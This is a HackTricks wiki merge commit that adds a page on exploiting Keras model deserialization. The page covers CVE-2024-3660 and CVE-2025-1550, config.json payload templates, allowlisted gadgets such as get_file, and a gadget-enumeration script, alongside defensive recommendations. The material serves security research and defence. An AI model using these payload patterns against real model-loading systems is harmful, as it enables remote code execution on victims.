Merge pull request #1313 from HackTricks-wiki/update_Hunting_Vulnerabilities_in_Keras_Model_Deserializa_20250820_124658

carlospolop · web-flow · commit 1624c21cd4fe · 2025-08-22T02:05:10.000+02:00
Hunting Vulnerabilities in Keras Model Deserialization
diff --git a/src/AI/AI-Models-RCE.md b/src/AI/AI-Models-RCE.md
@@ -177,11 +177,20 @@ with tarfile.open("symlink_demo.model", "w:gz") as tf:
     tf.add(PAYLOAD)                      # rides the symlink
 ```
 
+### Deep-dive: Keras .keras deserialization and gadget hunting
+
+For a focused guide on .keras internals, Lambda-layer RCE, the arbitrary import issue in Keras ≤ 3.8, and post-fix gadget discovery inside the allowlist, see:
+
+
+{{#ref}}
+../generic-methodologies-and-resources/python/keras-model-deserialization-rce-and-gadget-hunting.md
+{{#endref}}
+
 ## References
 
 - [OffSec blog – "CVE-2024-12029 – InvokeAI Deserialization of Untrusted Data"](https://www.offsec.com/blog/cve-2024-12029/)
 - [InvokeAI patch commit 756008d](https://github.com/invoke-ai/invokeai/commit/756008dc5899081c5aa51e5bd8f24c1b3975a59e)
 - [Rapid7 Metasploit module documentation](https://www.rapid7.com/db/modules/exploit/linux/http/invokeai_rce_cve_2024_12029/)
 - [PyTorch – security considerations for torch.load](https://pytorch.org/docs/stable/notes/serialization.html#security)
 
-{{#include ../banners/hacktricks-training.md}}
+{{#include ../banners/hacktricks-training.md}}
diff --git a/src/SUMMARY.md b/src/SUMMARY.md
@@ -69,6 +69,7 @@
   - [Bypass Python sandboxes](generic-methodologies-and-resources/python/bypass-python-sandboxes/README.md)
     - [LOAD_NAME / LOAD_CONST opcode OOB Read](generic-methodologies-and-resources/python/bypass-python-sandboxes/load_name-load_const-opcode-oob-read.md)
   - [Class Pollution (Python's Prototype Pollution)](generic-methodologies-and-resources/python/class-pollution-pythons-prototype-pollution.md)
+  - [Keras Model Deserialization RCE and Gadget Hunting](generic-methodologies-and-resources/python/keras-model-deserialization-rce-and-gadget-hunting.md)
   - [Python Internal Read Gadgets](generic-methodologies-and-resources/python/python-internal-read-gadgets.md)
   - [Pyscript](generic-methodologies-and-resources/python/pyscript.md)
   - [venv](generic-methodologies-and-resources/python/venv.md)
diff --git a/src/generic-methodologies-and-resources/python/README.md b/src/generic-methodologies-and-resources/python/README.md
@@ -7,6 +7,7 @@
 
 - [**Pyscript hacking tricks**](pyscript.md)
 - [**Python deserializations**](../../pentesting-web/deserialization/README.md)
+- [**Keras model deserialization RCE and gadget hunting**](keras-model-deserialization-rce-and-gadget-hunting.md)
 - [**Tricks to bypass python sandboxes**](bypass-python-sandboxes/README.md)
 - [**Basic python web requests syntax**](web-requests.md)
 - [**Basic python syntax and libraries**](basic-python.md)
diff --git a/src/generic-methodologies-and-resources/python/keras-model-deserialization-rce-and-gadget-hunting.md b/src/generic-methodologies-and-resources/python/keras-model-deserialization-rce-and-gadget-hunting.md
@@ -0,0 +1,219 @@
+# Keras Model Deserialization RCE and Gadget Hunting
+
+{{#include ../../banners/hacktricks-training.md}}
+
+This page summarizes practical exploitation techniques against the Keras model deserialization pipeline, explains the native .keras format internals and attack surface, and provides a researcher toolkit for finding Model File Vulnerabilities (MFVs) and post-fix gadgets.
+
+## .keras model format internals
+
+A .keras file is a ZIP archive containing at least:
+- metadata.json – generic info (e.g., Keras version)
+- config.json – model architecture (primary attack surface)
+- model.weights.h5 – weights in HDF5
+
+The config.json drives recursive deserialization: Keras imports modules, resolves classes/functions and reconstructs layers/objects from attacker-controlled dictionaries.
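As a minimal sketch of the layout above, the following opens a .keras file with the standard `zipfile` module and parses config.json without importing Keras at all. The helper name `read_keras_config` and the in-memory demo archive are illustrative assumptions, not part of Keras.

```python
import io
import json
import zipfile

def read_keras_config(source):
    """Return (member names, parsed config.json) without importing Keras."""
    with zipfile.ZipFile(source) as zf:
        names = zf.namelist()
        config = json.loads(zf.read("config.json"))
    return names, config

# Build a tiny stand-in archive in memory (hypothetical content, for illustration only).
buf = io.BytesIO()
with zipfile.ZipFile(buf, "w") as zf:
    zf.writestr("metadata.json", json.dumps({"keras_version": "3.8.0"}))
    zf.writestr(
        "config.json",
        json.dumps({"module": "keras.layers", "class_name": "Dense", "config": {"units": 64}}),
    )
buf.seek(0)

names, config = read_keras_config(buf)
print(names)
print(config["class_name"])
```

Reading the archive this way keeps triage static: nothing in config.json is resolved or instantiated.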
+
+Example snippet for a Dense layer object:
+
+```json
+{
+  "module": "keras.layers",
+  "class_name": "Dense",
+  "config": {
+    "units": 64,
+    "activation": {
+      "module": "keras.activations",
+      "class_name": "relu"
+    },
+    "kernel_initializer": {
+      "module": "keras.initializers",
+      "class_name": "GlorotUniform"
+    }
+  }
+}
+```
+
+Deserialization performs:
+- Module import and symbol resolution from module/class_name keys
+- from_config(...) or constructor invocation with attacker-controlled kwargs
+- Recursion into nested objects (activations, initializers, constraints, etc.)
+
+Historically, this exposed three primitives to an attacker crafting config.json:
+- Control of what modules are imported
+- Control of which classes/functions are resolved
+- Control of kwargs passed into constructors/from_config
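To see how far those primitives reach in a given file, one option is to walk the parsed config and list every module/class_name pair it would ask the loader to resolve. This is a rough sketch; `iter_references` is a hypothetical helper and the sample dictionary is a trimmed copy of the Dense example.

```python
def iter_references(node):
    """Yield (module, class_name) for every serialized object in a config tree."""
    if isinstance(node, dict):
        if "class_name" in node:
            yield node.get("module"), node["class_name"]
        for value in node.values():
            yield from iter_references(value)
    elif isinstance(node, list):
        for item in node:
            yield from iter_references(item)

dense = {
    "module": "keras.layers",
    "class_name": "Dense",
    "config": {
        "units": 64,
        "activation": {"module": "keras.activations", "class_name": "relu"},
    },
}

refs = list(iter_references(dense))
print(refs)
```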
+
+## CVE-2024-3660 – Lambda-layer bytecode RCE
+
+Root cause:
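+- Lambda.from_config() used python_utils.func_load(...), which base64-decodes attacker-controlled bytes and calls marshal.loads() on them. The resulting code object is wrapped in a Python function that runs when the layer is called, giving the attacker arbitrary code execution.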
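The mechanism can be illustrated with the standard library alone. The sketch below is a simplified stand-in for the pattern, not Keras's actual func_load code: it marshals the code object of a benign function, decodes it again, and rebuilds a callable with `types.FunctionType`. The names `benign` and `rebuilt` are made up for the demo.

```python
import base64
import marshal
import types

def benign(x):
    return x + 1

# Saving side: only the code object is serialized, standing in for the bytes in config.json.
blob = base64.b64encode(marshal.dumps(benign.__code__)).decode()

# Loading side: decode, unmarshal, then rebuild a function around the code object.
code = marshal.loads(base64.b64decode(blob))
rebuilt = types.FunctionType(code, globals(), "rebuilt")

# The code object is inert data until the rebuilt function is actually called.
result = rebuilt(41)
print(result)
```

Whoever controls the marshalled bytes controls the body of the function that is later invoked, which is why loaders must not rebuild callables from untrusted input.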
+
+Exploit idea (simplified payload in config.json):
+
+```json
+{
+  "module": "keras.layers",
+  "class_name": "Lambda",
+  "config": {
+    "name": "exploit_lambda",
+    "function": {
+      "function_type": "lambda",
+      "bytecode_b64": "<attacker_base64_marshal_payload>"
+    }
+  }
+}
+```
+
+Mitigation:
+- Keras enforces safe_mode=True by default. Serialized Python functions in Lambda are blocked unless a user explicitly opts out with safe_mode=False.
+
+Notes:
+- Legacy formats (older HDF5 saves) or older codebases may not enforce modern checks, so “downgrade” style attacks can still apply when victims use older loaders.
+
+## CVE-2025-1550 – Arbitrary module import in Keras ≤ 3.8
+
+Root cause:
+- _retrieve_class_or_fn used unrestricted importlib.import_module() with attacker-controlled module strings from config.json.
+- Impact: Arbitrary import of any installed module (or attacker-planted module on sys.path). Import-time code runs, then object construction occurs with attacker kwargs.
+
+Exploit idea:
+
+```json
+{
+  "module": "maliciouspkg",
+  "class_name": "Danger",
+  "config": {"arg": "val"}
+}
+```
+
+Security improvements (Keras ≥ 3.9):
+- Module allowlist: imports restricted to official ecosystem modules: keras, keras_hub, keras_cv, keras_nlp
+- Safe mode default: safe_mode=True blocks unsafe Lambda serialized-function loading
+- Basic type checking: deserialized objects must match expected types
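The allowlist idea can be sketched as a check on the top-level package of the module string. This is an illustration under the assumption that only the first dotted component matters; it is not the exact check implemented in Keras, and `is_allowed_module` is a hypothetical name.

```python
ALLOWED_ROOTS = {"keras", "keras_hub", "keras_cv", "keras_nlp"}

def is_allowed_module(module):
    """True if the top-level package of `module` is in the allowlist."""
    if not isinstance(module, str) or not module:
        return False
    # Compare the whole first component; a bare startswith("keras") would accept "kerasx".
    return module.split(".", 1)[0] in ALLOWED_ROOTS

samples = ["keras.layers", "keras_cv.models", "maliciouspkg", "kerasx.evil", "os"]
checks = {name: is_allowed_module(name) for name in samples}
print(checks)
```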
+
+## Post-fix gadget surface inside allowlist
+
+Even with allowlisting and safe mode, a broad surface remains among allowed Keras callables. For example, keras.utils.get_file can download arbitrary URLs to user-selectable locations.
+
+Gadget via Lambda that references an allowed function (not serialized Python bytecode):
+
+```json
+{
+  "module": "keras.layers",
+  "class_name": "Lambda",
+  "config": {
+    "name": "dl",
+    "function": {"module": "keras.utils", "class_name": "get_file"},
+    "arguments": {
+      "fname": "artifact.bin",
+      "origin": "https://example.com/artifact.bin",
+      "cache_dir": "/tmp/keras-cache"
+    }
+  }
+}
+```
+
+Important limitation:
+- Lambda.call() prepends the input tensor as the first positional argument when invoking the target callable. Chosen gadgets must tolerate an extra positional arg (or accept *args/**kwargs). This constrains which functions are viable.
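One way to pre-filter candidates against this constraint is to test whether a signature binds with one extra leading positional argument plus the chosen keyword arguments. The sketch below uses `inspect.signature(...).bind`; the two stub functions are hypothetical shapes, not real Keras callables.

```python
import inspect

def tolerates_lambda_call(func, arguments):
    """True if func(<input>, **arguments) would bind without a TypeError."""
    try:
        inspect.signature(func).bind(object(), **arguments)
    except (TypeError, ValueError):
        return False
    return True

def takes_positional(inputs, fname=None, origin=None):  # hypothetical gadget shape
    pass

def takes_only_keywords(*, fname, origin):  # hypothetical gadget shape
    pass

args = {"fname": "x", "origin": "https://example.com/x"}
ok_positional = tolerates_lambda_call(takes_positional, args)
ok_keyword_only = tolerates_lambda_call(takes_only_keywords, args)
print(ok_positional, ok_keyword_only)
```

The same check also rejects configurations in which a keyword in `arguments` names the parameter that the positional input already fills, since binding then fails with a duplicate-argument error.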
+
+Potential impacts of allowlisted gadgets:
+- Arbitrary download/write (path planting, config poisoning)
+- Network callbacks/SSRF-like effects depending on environment
+- Chaining to code execution if written paths are later imported/executed or added to PYTHONPATH, or if a writable execution-on-write location exists
+
+## Researcher toolkit
+
+1) Systematic gadget discovery in allowed modules
+
+Enumerate candidate callables across keras, keras_nlp, keras_cv, keras_hub and prioritize those with file/network/process/env side effects.
+
+```python
+import importlib, inspect, pkgutil
+
+ALLOWLIST = ["keras", "keras_nlp", "keras_cv", "keras_hub"]
+
+seen = set()
+
+def iter_modules(mod):
+    if not hasattr(mod, "__path__"):
+        return
+    for m in pkgutil.walk_packages(mod.__path__, mod.__name__ + "."):
+        yield m.name
+
+candidates = []
+for root in ALLOWLIST:
+    try:
+        r = importlib.import_module(root)
+    except Exception:
+        continue
+    for name in iter_modules(r):
+        if name in seen:
+            continue
+        seen.add(name)
+        try:
+            m = importlib.import_module(name)
+        except Exception:
+            continue
+        for n, obj in inspect.getmembers(m):
+            if inspect.isfunction(obj) or inspect.isclass(obj):
+                sig = None
+                try:
+                    sig = str(inspect.signature(obj))
+                except Exception:
+                    pass
+                doc = (inspect.getdoc(obj) or "").lower()
+                # Report only the first docstring line so the output stays readable
+                summary = doc.split("\n", 1)[0]
+                text = f"{name}.{n} {sig} :: {summary}"
+                # Heuristics: look for I/O or network-ish hints anywhere in the docstring
+                if any(x in doc for x in ["download", "file", "path", "open", "url", "http", "socket", "env", "process", "spawn", "exec"]):
+                    candidates.append(text)
+
+print("\n".join(sorted(candidates)[:200]))
+```
+
+2) Direct deserialization testing (no .keras archive needed)
+
+Feed crafted dicts directly into Keras deserializers to learn accepted params and observe side effects.
+
+```python
+from keras import saving
+
+cfg = {
+  "module": "keras.layers",
+  "class_name": "Lambda",
+  "config": {
+    "name": "probe",
+    "function": {"module": "keras.utils", "class_name": "get_file"},
+    "arguments": {"fname": "x", "origin": "https://example.com/x"}
+  }
+}
+
+# deserialize_keras_object takes safe_mode explicitly; observe errors and side effects
+layer = saving.deserialize_keras_object(cfg, safe_mode=True)
+```
+
+3) Cross-version probing and formats
+
+Keras exists in multiple codebases/eras with different guardrails and formats:
+- TensorFlow built-in Keras: tensorflow/python/keras (legacy, slated for deletion)
+- tf-keras: maintained separately
+- Multi-backend Keras 3 (official): introduced native .keras
+
+Repeat tests across codebases and formats (.keras vs legacy HDF5) to uncover regressions or missing guards.
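When repeating tests, it helps to record which codebases are actually installed in each environment. A small sketch using `importlib.metadata` follows; the distribution names are assumed to be the usual PyPI names, and the last entry is a deliberately missing package to show the fallback.

```python
from importlib import metadata

def installed_versions(distributions):
    """Map each distribution name to its installed version, or None if absent."""
    found = {}
    for name in distributions:
        try:
            found[name] = metadata.version(name)
        except metadata.PackageNotFoundError:
            found[name] = None
    return found

versions = installed_versions(
    ["keras", "tf-keras", "tensorflow", "definitely-not-installed-pkg"]
)
print(versions)
```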
+
+## Defensive recommendations
+
+- Treat model files as untrusted input. Only load models from trusted sources.
+- Keep Keras up to date; use Keras ≥ 3.9 to benefit from allowlisting and type checks.
+- Do not set safe_mode=False when loading models unless you fully trust the file.
+- Consider running deserialization in a sandboxed, least-privileged environment without network egress and with restricted filesystem access.
+- Enforce allowlists/signatures for model sources and integrity checking where possible.
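For the integrity-checking point, a minimal sketch is to pin a SHA-256 digest for each approved model file and refuse to load anything that does not match. The helper names and the throwaway demo file are assumptions for illustration; where the pinned digests are stored is left open.

```python
import hashlib
import hmac
import os
import tempfile

def sha256_of(path, chunk_size=1 << 20):
    """Hash a file in chunks so large model files do not need to fit in memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()

def verify_model(path, expected_sha256):
    """True only if the file's digest matches the pinned value."""
    return hmac.compare_digest(sha256_of(path), expected_sha256.lower())

# Demo with a throwaway file standing in for a model artifact.
with tempfile.NamedTemporaryFile(delete=False, suffix=".keras") as tmp:
    tmp.write(b"model-bytes")
    model_path = tmp.name

pinned = hashlib.sha256(b"model-bytes").hexdigest()
matches = verify_model(model_path, pinned)
tampered = verify_model(model_path, "0" * 64)
os.unlink(model_path)
print(matches, tampered)
```

A digest check only proves the file is the one that was approved; it does not make an untrusted model safe to load.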
+
+## References
+
+- [Hunting Vulnerabilities in Keras Model Deserialization (huntr blog)](https://blog.huntr.com/hunting-vulnerabilities-in-keras-model-deserialization)
+- [Keras PR #20751 – Added checks to serialization](https://github.com/keras-team/keras/pull/20751)
+- [CVE-2024-3660 – Keras Lambda deserialization RCE](https://nvd.nist.gov/vuln/detail/CVE-2024-3660)
+- [CVE-2025-1550 – Keras arbitrary module import (≤ 3.8)](https://nvd.nist.gov/vuln/detail/CVE-2025-1550)
+- [huntr report – arbitrary import #1](https://huntr.com/bounties/135d5dcd-f05f-439f-8d8f-b21fdf171f3e)
+- [huntr report – arbitrary import #2](https://huntr.com/bounties/6fcca09c-8c98-4bc5-b32c-e883ab3e4ae3)
+
+{{#include ../../banners/hacktricks-training.md}}